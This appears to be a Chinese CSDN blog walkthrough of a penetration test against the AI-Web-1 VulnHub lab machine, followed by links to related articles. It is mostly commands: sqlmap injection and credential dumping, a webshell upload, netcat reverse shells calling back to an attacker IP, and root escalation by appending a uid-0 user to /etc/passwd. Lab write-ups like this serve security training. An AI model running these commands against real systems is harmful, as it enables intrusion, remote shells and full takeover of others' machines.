AiWeb渗透记录

最新推荐文章于 2024-06-29 21:27:33 发布
最新推荐文章于 2024-06-29 21:27:33 发布
阅读量413 收藏 4
点赞数 8
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/althumi/article/details/135026311
版权
本文介绍了使用netdiscover扫描网段,Nmap进行主机和端口扫描,Dirb探测网站目录,发现并利用SQL注入获取shell,以及进行文件上传和提权的过程。展示了黑客如何逐步渗透和控制目标系统。
摘要由CSDN通过智能技术生成 
netdiscover #扫描当前网段主机

nmap -sS -sV -A -n 192.168.10.105 #扫描主机(192.168.10.105)的端口开发情况等详细信息

dirb http://192.168.10.105 #扫描网站目录

dirb http://192.168.10.105/m3diNf0/

http://192.168.10.105/m3diNf0/info.php #发现后台php信息页面,访问获取网站访问根目录/home/www/html/web1x443290o2sdf92213

dirb http://192.168.10.105/se3reTdir777 

#发现http://192.168.10.105/se3reTdir777/index.php存在SQL注入,进行注入测试
sqlmap -u http://192.168.10.105/se3reTdir777/index.php --data="uid=1&Operation=Submit" -D aiweb1 -T systemUser -C id,userName,password --dumps

#systemUser表信息,没有发现登录页面,信息无用。
+----+-----------+----------------------------------------------+
| id | userName  | password                                     |
+----+-----------+----------------------------------------------+
| 1  | t00r      | RmFrZVVzZXJQYXNzdzByZA==                     |
| 2  | aiweb1pwn | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== |
| 3  | u3er      | TjB0VGhpczBuZUFsczA=                         |
+----+-----------+----------------------------------------------+

#sqlmap获取shell
sqlmap -u "http://192.168.10.105/se3reTdir777/" --data "uid=1&Operation=Submit"  --level=3 --os-shell #

#文件上传目录
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

#使用sqlmap,上传木马
sqlmap -u "http://192.168.10.105/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write /home/kali/Desktop/mywork/b.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/b.php

#使用蚁剑连接木马
http://192.168.10.105/se3reTdir777/uploads/hack.php

#kali开启6666端口监听
nc -lvvp 6666

#目标主机尝试连接kali,ubuntu版本删除了-e参数,没有回弹
nc -e /bin/bash 192.168.10.106 6666
#kali主机nc回弹,获取shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.106 6666 >/tmp/f
#更改终端样式
python -c "import pty;pty.spawn('/bin/bash')"
#查询sudo权限文件
find / -user root -perm -4000 -print 2>/dev/null 
#查询目标主机内核版本
uname -a
Linux aiweb1 4.15.0-58-generic
#搜索是否存在内核漏洞
searchsploit linux kernel 4.15.0 
#当前内核另一种漏洞,创建hacker账号
openssl passwd -1 -salt hacker 123456
#将hacker信息写入/root权限中,获取root,提权成功
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd
althumi
关注
kali web渗透测试
Y20220308018的博客
11-08 184
被动信息收集指的是在用户不知情或没有意识到的情况下,通过各种技术手段收集用户的信息,如IP地址、浏览器类型、操作系统、设备信息、网站访问记录等。在进行被动信息收集时,可以使用Maltego来查找目标的各种信息,从而了解目标的情况。使用Nmap进行端口扫描:Nmap是一款专业的端口扫描工具,它可以扫描目标主机上的所有打开的端口并提供详细的信息,如端口号、协议、服务类型等。在开发工具中选择“Network”选项卡,可以查看网页的所有请求和响应信息,包括请求和响应头信息,请求方式,返回状态码,传输的数据等。
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2332
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
AI该如何运用于Web渗透测试?
Ms08067安全实验室
04-08 243
点击星标,即时接收最新推文AI+网络安全案例:AI助力GitHub工具回溯国内行业内首个AI+安全培训班,AI时代还在苦苦学习不如让AI为你打工。AI+安全=捷径让AI打工=薅公司羊毛AI=下一个安全趋势本期AI特色AI助力-BypassAI助力-密码学入门AI助力-情报收集与分析AI在应急响应下的使用场景内部圆桌课堂:共话AI+安全课程特点(1)零基础导入体系:0基础学习Web渗透,从0到1,理...
vulnhub靶机AI-Web-1.0渗透过程
2401_82463993的博客
03-08 1049
(根据前面找到的info.php文件暴露的信息,绝对路径选择:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/)下面就是要选择文件路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/(info.php里面就是服务器上的PHP配置信息,这个页面会列出PHP版本、服务器操作系统、PHP配置参数等信息)这边有个index.php文件,(这是个网站的默认首页文件)访问一下。
应届硕士70W,确实可以封神了!!
小白学视觉
12-15 106
“大模型狂热”从未停止谷歌最强AI模型Gemini问世,登上AI天花板国内巨头战队华为、百度、阿里在AIGC的厮杀中从通用大模型渗透到各垂类应用市场就连中国创投资本也独宠AIGC企业百度、科大讯飞市值分别增加27亿和45亿美元这导致AI人才缺口大、价格贵硕士毕业年薪可达70万元甚至还有百万年薪挖掘大模型人才!!作为程序员,如何抢占先机,享受AI技术带来的红利?!????知乎知学堂邀你加入:行业前沿资源...
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 559
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
资讯|如何实现高效的自动化渗透测试?
公众号【伤心的辣条】资料领取~
03-30 635
随着当前网络安全威胁的不断扩展与升级,开展渗透测试工作已经成为广大企业组织主动识别安全漏洞与潜在风险的关键过程。然而,传统的人工渗透测试模式对测试人员的专业能力和经验水平有很高的要求,企业需要投入较大的时间和资源才能完成。在此背景下,自动化渗透测试已成为渗透测试领域的重点研究内容,并被认为是人工渗透测试的一种演进形式。
vulnhub靶机AI-Web2渗透笔记
liver100day的博客
07-24 2134
文章目录环境准备渗透过程1.信息收集1.1 主机发现1.2 端口扫描1.3 访问web网页(80端口)2.漏洞利用1 利用目录穿越(Directory Traversal)漏洞读取/etc/passwd2.利用暴力破解获取密码4 获得目标shell提权 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-2,357/ 渗透过程 1.信息收集 1..
人工智能如何影响 IT 安全渗透测试的未来
qq_34657922的博客
03-23 859
很明显,渗透测试服务的未来将坚定不移地坚持人工智能,让测试结果更加准确和高效。借助 AI 驱动的工具,渗透测试人员可以直接专注于开发周期本身,并在另一端获得最大的安全性。然而,令人震惊的统计数据中的漏洞正在增加,如果不及时修补,可能会对企业造成严重后果。当设计不佳的 Web 应用程序、未打补丁的网络环境、可利用的密码、复杂的威胁以及更多的威胁出现在安全眼前时,让我们看看 AI 将如何应对未来的这些挑战。
开发AI黑客机器人并上传全云端
最新发布
Sunspot
06-29 999
黑客机器人开发是指开发一种具有黑客技术的自动化程序或机器人。这些机器人可以执行各种黑客活动,如渗透测试、漏洞扫描、密码破解等。
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2727
AI-WEB-1.0靶机的简单攻略
实战项目之AIWEB2靶场渗透
胖虎的博客
11-05 1386
AIweb2靶场渗透测试
都2024年了,还不会用AI来协助自己挖洞 / 渗透测试?
ooooooih的博客
04-30 435
AI大模型已经出来这么久了,我日常在本职开发过程中已经基本离不开它了,CoPilot只能说是神器,最少提高了我30%以上的开发效率! 于是乎我把主意打到了挖洞上面,没道理它能提高我的开发效率,不能提升我的挖洞效率啊,我不相信(不允许!)会有这么不科学的事情发生。
AI 渗透应用程序开发的七种趋势及方法
喜欢打酱油的老鸟
11-26 510
2019-11-25 17:12:31 如果你最近一直在关注科技新闻,那么可能已经读到了有关人工智能的新闻,无论好坏。它在你能想到的每个行业都留下了自己的印记。诸如Google,Facebook和Microsoft之类的科技巨头都将赌注押在AI上,并花费数十亿美元用于开发高级AI。 如果你是移动应用程序开发人员或移动应用程序用户怎么办?人工智能会以积极或消极的方式影响移动应用程序的开...
记一次AI Web 2.0渗透测试过程
weixin_48840076的博客
09-19 563
目录 目录 2 1.基本概况 3 1.1 基本信息 3 1.2 渗透环境及工具 3 1.3 渗透目标 3 2.具体渗透过程 3 2.1 整体概况 3 2.2 详细过程 3 2.2.1 确定IP 3 2.2.2 信息收集 3 2.2.3 漏洞扫描 3 2.2.4 漏洞利用 4 2.2.5 提权 4 3.总结 4 致 谢 5 1.基本概况 1.1基本信息 当前服务器的基本信息:操作系...
vulnhub靶机AI-WEB-1.0渗透测试
Long_gone的博客
09-29 1646
首先用netdiscover工具扫描一下靶机IP: netdiscover 由经验推断出靶机IP为:192.168.34.228,接着使用nmap工具扫描一下靶机端口的开放情况: nmap -sV -p 0-65535 192.168.34.228 发现靶机只开放了80端口,然后访问一下看看: 然后试一下目录爆破: dirb http://192.168.34.228 发现robot...
看完这篇 教你玩转渗透测试靶机vulnhub——Ai-Web1
热门推荐
Aluxian_的博客
04-26 1万+
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个Web的漏洞靶机,老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/a
极光无限渗透测试面经_AI自动化渗透测试平台“极光猎手”域名探测模块免费开放...
weixin_42517649的博客
01-03 786
帮助护网防守企业,探测影子资产,发现安全隐患。老虎,被公认为“兽中之王”,四肢强大,牙齿锋利。除了凶猛的外在,老虎还具备猎手的智慧。一个成功的猎手,一定是不动如石,蓄势待发,一旦锁定目标,便迅捷如风。而老虎天生就是这样猎手般的存在!如今,“猎手”这个词被赋予了新的含义。今天,极光无限AI自动化渗透测试平台——极光猎手正式上线,目前只开放“子域名探测”模块,免费开放一个月。平台入口:https://...
kali linux web 渗透秘籍
09-07
作为一个 AI,我无法提供任何违法、攻击性或不道德的信息。我无法提供关于渗透测试工具的详细指南。Kali Linux 是一款强大的渗透测试和网络安全评估工具,如果你有合法的目的和许可证,可以在合规和合法的范围内使用它。 如果你想学习网络安全和渗透测试,我建议你通过正规途径获取相关的知识和技能。可以参加合法的培训课程、认证考试,或者阅读相关的书籍和论文。遵守法律和道德规范是非常重要的,以确保网络安全行业的健康发展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值